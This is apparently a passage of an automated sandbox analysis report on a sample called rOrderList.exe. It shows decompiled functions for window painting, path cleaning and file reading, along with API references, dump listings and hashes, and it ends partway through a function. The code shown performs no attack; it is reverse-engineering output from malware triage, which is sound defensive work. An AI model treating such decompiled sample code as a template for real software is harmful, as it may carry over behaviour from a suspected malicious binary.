                                                                                      0x004062b6
                                                                                      0x004062b2
                                                                                      0x004062b4
                                                                                      0x004062b5
                                                                                      0x004062b5
                                                                                      0x004062bd
                                                                                      0x004062bf
                                                                                      0x00000000
                                                                                      0x004062bf
                                                                                      0x00406289
                                                                                      0x0040628f
                                                                                      0x00000000
                                                                                      0x0040628f
                                                                                      0x0040625b
                                                                                      0x00406239
                                                                                      0x004061b8
                                                                                      0x004061c3
                                                                                      0x004061cc
                                                                                      0x004061d0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004061d0
                                                                                      0x00406301

                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406323,?,?), ref: 004061C3
                                                                                      • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004061CC
                                                                                        • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                                                                                        • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
                                                                                      • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 004061E9
                                                                                      • wsprintfA.USER32 ref: 00406207
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406242
                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406251
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406289
                                                                                      • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 004062DF
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004062F0
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F7
                                                                                        • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,00438800,80000000,00000003), ref: 00406036
                                                                                        • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                      • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                                      • API String ID: 2171350718-2295842750
                                                                                      • Opcode ID: 0e349bceaff302caa424ff24830ddfb5d0a14e47e24551b26cd9cce9b48995c7
                                                                                      • Instruction ID: 390cd084817c4cf50855a9647c10840f2cfe6cacc919d204b2e4a530669b52c0
                                                                                      • Opcode Fuzzy Hash: 0e349bceaff302caa424ff24830ddfb5d0a14e47e24551b26cd9cce9b48995c7
                                                                                      • Instruction Fuzzy Hash: FB312231200715BBC2207B659E49F5B3A9CEF41754F16007FBA42F62C2EA3CD82586BD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                      				struct tagLOGBRUSH _v16;
                                                                                      				struct tagRECT _v32;
                                                                                      				struct tagPAINTSTRUCT _v96;
                                                                                      				struct HDC__* _t70;
                                                                                      				struct HBRUSH__* _t87;
                                                                                      				struct HFONT__* _t94;
                                                                                      				long _t102;
                                                                                      				signed int _t126;
                                                                                      				struct HDC__* _t128;
                                                                                      				intOrPtr _t130;
                                                                                      
                                                                                      				if(_a8 == 0xf) {
                                                                                      					_t130 =  *0x42a274;
                                                                                      					_t70 = BeginPaint(_a4,  &_v96);
                                                                                      					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                      					_a8 = _t70;
                                                                                      					GetClientRect(_a4,  &_v32);
                                                                                      					_t126 = _v32.bottom;
                                                                                      					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                      					while(_v32.top < _t126) {
                                                                                      						_a12 = _t126 - _v32.top;
                                                                                      						asm("cdq");
                                                                                      						asm("cdq");
                                                                                      						asm("cdq");
                                                                                      						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                      						_t87 = CreateBrushIndirect( &_v16);
                                                                                      						_v32.bottom = _v32.bottom + 4;
                                                                                      						_a16 = _t87;
                                                                                      						FillRect(_a8,  &_v32, _t87);
                                                                                      						DeleteObject(_a16);
                                                                                      						_v32.top = _v32.top + 4;
                                                                                      					}
                                                                                      					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                      						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                                      						_a16 = _t94;
                                                                                      						if(_t94 != 0) {
                                                                                      							_t128 = _a8;
                                                                                      							_v32.left = 0x10;
                                                                                      							_v32.top = 8;
                                                                                      							SetBkMode(_t128, 1);
                                                                                      							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                      							_a8 = SelectObject(_t128, _a16);
                                                                                      							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                                                                                      							SelectObject(_t128, _a8);
                                                                                      							DeleteObject(_a16);
                                                                                      						}
                                                                                      					}
                                                                                      					EndPaint(_a4,  &_v96);
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t102 = _a16;
                                                                                      				if(_a8 == 0x46) {
                                                                                      					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                      					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                                                                                      				}
                                                                                      				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                                      			}













                                                                                      0x0040100a
                                                                                      0x00401039
                                                                                      0x00401047
                                                                                      0x0040104d
                                                                                      0x00401051
                                                                                      0x0040105b
                                                                                      0x00401061
                                                                                      0x00401064
                                                                                      0x004010f3
                                                                                      0x00401089
                                                                                      0x0040108c
                                                                                      0x004010a6
                                                                                      0x004010bd
                                                                                      0x004010cc
                                                                                      0x004010cf
                                                                                      0x004010d5
                                                                                      0x004010d9
                                                                                      0x004010e4
                                                                                      0x004010ed
                                                                                      0x004010ef
                                                                                      0x004010ef
                                                                                      0x00401100
                                                                                      0x00401105
                                                                                      0x0040110d
                                                                                      0x00401110
                                                                                      0x00401112
                                                                                      0x00401118
                                                                                      0x0040111f
                                                                                      0x00401126
                                                                                      0x00401130
                                                                                      0x00401142
                                                                                      0x00401156
                                                                                      0x00401160
                                                                                      0x00401165
                                                                                      0x00401165
                                                                                      0x00401110
                                                                                      0x0040116e
                                                                                      0x00000000
                                                                                      0x00401178
                                                                                      0x00401010
                                                                                      0x00401013
                                                                                      0x00401015
                                                                                      0x0040101f
                                                                                      0x0040101f
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                      • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                      • String ID: F
                                                                                      • API String ID: 941294808-1304234792
                                                                                      • Opcode ID: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
                                                                                      • Instruction ID: 0f43a076eda42f240989ba3bcaaa7122e90b548761b3bfdbbaf4c3cca9648f62
                                                                                      • Opcode Fuzzy Hash: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
                                                                                      • Instruction Fuzzy Hash: CF418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7389A55DFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 91%
                                                                                      			E004067EB(WCHAR* _a4) {
                                                                                      				short _t5;
                                                                                      				short _t7;
                                                                                      				WCHAR* _t19;
                                                                                      				WCHAR* _t20;
                                                                                      				WCHAR* _t21;
                                                                                      
                                                                                      				_t20 = _a4;
                                                                                      				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                                      					_t20 =  &(_t20[4]);
                                                                                      				}
                                                                                      				if( *_t20 != 0 && E00405E88(_t20) != 0) {
                                                                                      					_t20 =  &(_t20[2]);
                                                                                      				}
                                                                                      				_t5 =  *_t20;
                                                                                      				_t21 = _t20;
                                                                                      				_t19 = _t20;
                                                                                      				if(_t5 != 0) {
                                                                                      					do {
                                                                                      						if(_t5 > 0x1f &&  *((short*)(E00405E3E(L"*?|<>/\":", _t5))) == 0) {
                                                                                      							E00405FED(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                                      							_t19 = CharNextW(_t19);
                                                                                      						}
                                                                                      						_t20 = CharNextW(_t20);
                                                                                      						_t5 =  *_t20;
                                                                                      					} while (_t5 != 0);
                                                                                      				}
                                                                                      				 *_t19 =  *_t19 & 0x00000000;
                                                                                      				while(1) {
                                                                                      					_push(_t19);
                                                                                      					_push(_t21);
                                                                                      					_t19 = CharPrevW();
                                                                                      					_t7 =  *_t19;
                                                                                      					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                      						break;
                                                                                      					}
                                                                                      					 *_t19 =  *_t19 & 0x00000000;
                                                                                      					if(_t21 < _t19) {
                                                                                      						continue;
                                                                                      					}
                                                                                      					break;
                                                                                      				}
                                                                                      				return _t7;
                                                                                      			}








                                                                                      0x004067ed
                                                                                      0x004067f6
                                                                                      0x0040680d
                                                                                      0x0040680d
                                                                                      0x00406814
                                                                                      0x00406820
                                                                                      0x00406820
                                                                                      0x00406823
                                                                                      0x00406826
                                                                                      0x0040682b
                                                                                      0x0040682d
                                                                                      0x00406836
                                                                                      0x0040683a
                                                                                      0x00406857
                                                                                      0x0040685f
                                                                                      0x0040685f
                                                                                      0x00406864
                                                                                      0x00406866
                                                                                      0x00406869
                                                                                      0x0040686e
                                                                                      0x0040686f
                                                                                      0x00406873
                                                                                      0x00406873
                                                                                      0x00406874
                                                                                      0x0040687b
                                                                                      0x0040687d
                                                                                      0x00406884
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040688c
                                                                                      0x00406892
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406892
                                                                                      0x00406897

                                                                                      APIs
                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,77253420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rOrderList.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                                                                                      • CharNextW.USER32(?,00000000,77253420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rOrderList.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
                                                                                      • CharPrevW.USER32(?,?,77253420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rOrderList.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004067EC
                                                                                      • *?|<>/":, xrefs: 0040683D
                                                                                      • "C:\Users\user\Desktop\rOrderList.exe", xrefs: 004067EB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: "C:\Users\user\Desktop\rOrderList.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 589700163-1064717463
                                                                                      • Opcode ID: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
                                                                                      • Instruction ID: fdbe35b52bffc5d77a346742aeba0a27372f18d7f8de2c65e324d6b3b11dfc69
                                                                                      • Opcode Fuzzy Hash: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
                                                                                      • Instruction Fuzzy Hash: 8211932780261255DB303B559C44AB762E8AF94790B56C83FED8A732C0EB7C4C9286BD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004044F9(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                      				struct tagLOGBRUSH _v16;
                                                                                      				long _t39;
                                                                                      				long _t41;
                                                                                      				void* _t44;
                                                                                      				signed char _t50;
                                                                                      				long* _t54;
                                                                                      
                                                                                      				if(_a4 + 0xfffffecd > 5) {
                                                                                      					L18:
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                                                      				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                      					goto L18;
                                                                                      				} else {
                                                                                      					_t50 = _t54[5];
                                                                                      					if((_t50 & 0xffffffe0) != 0) {
                                                                                      						goto L18;
                                                                                      					}
                                                                                      					_t39 =  *_t54;
                                                                                      					if((_t50 & 0x00000002) != 0) {
                                                                                      						_t39 = GetSysColor(_t39);
                                                                                      					}
                                                                                      					if((_t54[5] & 0x00000001) != 0) {
                                                                                      						SetTextColor(_a8, _t39);
                                                                                      					}
                                                                                      					SetBkMode(_a8, _t54[4]);
                                                                                      					_t41 = _t54[1];
                                                                                      					_v16.lbColor = _t41;
                                                                                      					if((_t54[5] & 0x00000008) != 0) {
                                                                                      						_t41 = GetSysColor(_t41);
                                                                                      						_v16.lbColor = _t41;
                                                                                      					}
                                                                                      					if((_t54[5] & 0x00000004) != 0) {
                                                                                      						SetBkColor(_a8, _t41);
                                                                                      					}
                                                                                      					if((_t54[5] & 0x00000010) != 0) {
                                                                                      						_v16.lbStyle = _t54[2];
                                                                                      						_t44 = _t54[3];
                                                                                      						if(_t44 != 0) {
                                                                                      							DeleteObject(_t44);
                                                                                      						}
                                                                                      						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                      					}
                                                                                      					return _t54[3];
                                                                                      				}
                                                                                      			}









                                                                                      0x0040450b
                                                                                      0x004045c1
                                                                                      0x00000000
                                                                                      0x004045c1
                                                                                      0x0040451c
                                                                                      0x00404520
                                                                                      0x00000000
                                                                                      0x0040453a
                                                                                      0x0040453a
                                                                                      0x00404543
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404545
                                                                                      0x00404551
                                                                                      0x00404554
                                                                                      0x00404554
                                                                                      0x0040455a
                                                                                      0x00404560
                                                                                      0x00404560
                                                                                      0x0040456c
                                                                                      0x00404572
                                                                                      0x00404579
                                                                                      0x0040457c
                                                                                      0x0040457f
                                                                                      0x00404581
                                                                                      0x00404581
                                                                                      0x00404589
                                                                                      0x0040458f
                                                                                      0x0040458f
                                                                                      0x00404599
                                                                                      0x0040459e
                                                                                      0x004045a1
                                                                                      0x004045a6
                                                                                      0x004045a9
                                                                                      0x004045a9
                                                                                      0x004045b9
                                                                                      0x004045b9
                                                                                      0x00000000
                                                                                      0x004045bc

                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404516
                                                                                      • GetSysColor.USER32(00000000), ref: 00404554
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404560
                                                                                      • SetBkMode.GDI32(?,?), ref: 0040456C
                                                                                      • GetSysColor.USER32(?), ref: 0040457F
                                                                                      • SetBkColor.GDI32(?,?), ref: 0040458F
                                                                                      • DeleteObject.GDI32(?), ref: 004045A9
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 004045B3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                      • Instruction ID: b56a63bd10d9b88d704488fa4fc448251793e5de010e462820c933ca6d0d38e3
                                                                                      • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                      • Instruction Fuzzy Hash: F52167B1500B04AFCB31DF68DD48A577BF8AF41714B048A2EEA96A26E1D734D904CF58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 87%
                                                                                      			E004026E4(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                                                      				intOrPtr _t65;
                                                                                      				intOrPtr _t66;
                                                                                      				intOrPtr _t72;
                                                                                      				void* _t76;
                                                                                      				void* _t79;
                                                                                      
                                                                                      				_t72 = __edx;
                                                                                      				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                                      				_t65 = 2;
                                                                                      				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                                                      				_t66 = E00402D1C(_t65);
                                                                                      				_t79 = _t66 - 1;
                                                                                      				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                                                      				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                                                      				if(_t79 < 0) {
                                                                                      					L36:
                                                                                      					 *0x42a308 =  *0x42a308 +  *(_t76 - 4);
                                                                                      				} else {
                                                                                      					__ecx = 0x3ff;
                                                                                      					if(__eax > 0x3ff) {
                                                                                      						 *(__ebp - 0x44) = 0x3ff;
                                                                                      					}
                                                                                      					if( *__edi == __bx) {
                                                                                      						L34:
                                                                                      						__ecx =  *(__ebp - 0xc);
                                                                                      						__eax =  *(__ebp - 8);
                                                                                      						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                                      						if(_t79 == 0) {
                                                                                      							 *(_t76 - 4) = 1;
                                                                                      						}
                                                                                      						goto L36;
                                                                                      					} else {
                                                                                      						 *(__ebp - 0x38) = __ebx;
                                                                                      						 *(__ebp - 0x18) = E0040649C(__ecx, __edi);
                                                                                      						if( *(__ebp - 0x44) > __ebx) {
                                                                                      							do {
                                                                                      								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                                                      									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406113( *(__ebp - 0x18), __ebx) >= 0) {
                                                                                      										__eax = __ebp - 0x50;
                                                                                      										if(E004060B5( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                                                      											goto L34;
                                                                                      										} else {
                                                                                      											goto L21;
                                                                                      										}
                                                                                      									} else {
                                                                                      										goto L34;
                                                                                      									}
                                                                                      								} else {
                                                                                      									__eax = __ebp - 0x40;
                                                                                      									_push(__ebx);
                                                                                      									_push(__ebp - 0x40);
                                                                                      									__eax = 2;
                                                                                      									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                                                      									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                                                      									if(__eax == 0) {
                                                                                      										goto L34;
                                                                                      									} else {
                                                                                      										__ecx =  *(__ebp - 0x40);
                                                                                      										if(__ecx == __ebx) {
                                                                                      											goto L34;
                                                                                      										} else {
                                                                                      											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                                      											 *(__ebp - 0x4c) = __ecx;
                                                                                      											 *(__ebp - 0x50) = __eax;
                                                                                      											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                      												L28:
                                                                                      												__ax & 0x0000ffff = E00406483( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                                      											} else {
                                                                                      												__ebp - 0x50 = __ebp + 0xa;
                                                                                      												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                                                      													L21:
                                                                                      													__eax =  *(__ebp - 0x50);
                                                                                      												} else {
                                                                                      													__edi =  *(__ebp - 0x4c);
                                                                                      													__edi =  ~( *(__ebp - 0x4c));
                                                                                      													while(1) {
                                                                                      														_t22 = __ebp - 0x40;
                                                                                      														 *_t22 =  *(__ebp - 0x40) - 1;
                                                                                      														__eax = 0xfffd;
                                                                                      														 *(__ebp - 0x50) = 0xfffd;
                                                                                      														if( *_t22 == 0) {
                                                                                      															goto L22;
                                                                                      														}
                                                                                      														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                                                      														__edi = __edi + 1;
                                                                                      														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                                                      														__eax = __ebp + 0xa;
                                                                                      														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                                                      															continue;
                                                                                      														} else {
                                                                                      															goto L21;
                                                                                      														}
                                                                                      														goto L22;
                                                                                      													}
                                                                                      												}
                                                                                      												L22:
                                                                                      												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                      													goto L28;
                                                                                      												} else {
                                                                                      													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                                                      														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                                      															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                                                      															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                                                      														} else {
                                                                                      															__ecx =  *(__ebp - 0xc);
                                                                                      															__edx =  *(__ebp - 8);
                                                                                      															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                      															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                      														}
                                                                                      														goto L34;
                                                                                      													} else {
                                                                                      														__ecx =  *(__ebp - 0xc);
                                                                                      														__edx =  *(__ebp - 8);
                                                                                      														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                      														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                      														 *(__ebp - 0x38) = __eax;
                                                                                      														if(__ax == __bx) {
                                                                                      															goto L34;
                                                                                      														} else {
                                                                                      															goto L26;
                                                                                      														}
                                                                                      													}
                                                                                      												}
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      								}
